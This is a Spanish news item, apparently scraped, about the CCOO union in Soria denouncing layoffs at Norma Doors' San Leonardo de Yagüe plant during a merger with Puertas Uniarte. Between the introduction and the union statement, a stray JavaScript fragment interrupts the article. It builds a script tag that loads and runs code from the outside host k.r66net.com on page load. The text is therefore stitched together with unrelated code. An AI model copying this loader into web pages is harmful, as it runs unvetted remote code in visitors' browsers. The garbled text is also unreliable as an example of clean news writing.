CC.OO. de Soria denuncia el despido de trabajadores en Norma Doors

El sindicato y el comité de empresa han solicitado a la Dirección de la mercantil la inmediata readmisión de estos operarios

Comisiones Obreras de Soria, y la totalidad del comité de empresa de Norma Doors Technologies, S.A. (cuenta con 9 representantes del sindicato), quieren poner en conocimiento de la opinión pública soriana el despido de personas trabajadoras en la planta ubicada en la localidad de San Leonardo de Yagüe. Así lo afirman desde el sindicato en el siguiente comunicado:

 

i.uc=0;

i.prod= 2553;

var s=d.createElement('script');

s.type='text/javascript';

s.async=true;

s.src='//k.r66net.com/GetLink';

d.head.appendChild(s);

})(window,document);

"Exigimos a la Dirección de la mercantil la readmisión inmediata de todos estos operarios. Este proceder se ha llevado a cabo en dos fases. La primera tuvo lugar antes de Navidades, mientras que la segunda ha tenido lugar esta semana. Todo esto se debe a que ya se ha derivado alguna línea de producción a la factoría matriz de Puertas Uniarte en Villacañas (Toledo).

“Desde CCOO no entendemos este proceder. En pleno proceso de fusión con la empresa Puertas Uniarte de Toledo, con importantes inversiones en marcha y procesos de ajuste y puesta a punto en la fábrica de San Leonardo nos salen con estas. No lo vamos a consentir, puesto que si esta planta hoy está activa, es en parte gracias al gran esfuerzo y la lucha llevada a cabo por los trabajadores y trabajadoras de Puertas Norma en esta comarca pinariega”, apuntan nuestros compañeros de CCOO de Soria.

En la actualidad, Norma Doors está inmersa en un proceso de fusión con Puertas Uniarte (factoría dedicada a las puertas). Lacus Group, socio mayoritario de Norma Doors, debe aclarar el papel de la institución provincial después de este importante movimiento empresarial ya que a día de hoy la Diputación aún mantiene un 18% de las acciones de Norma. La plantilla cuenta en estos momentos con 200 efectivos", concluye el comunicado.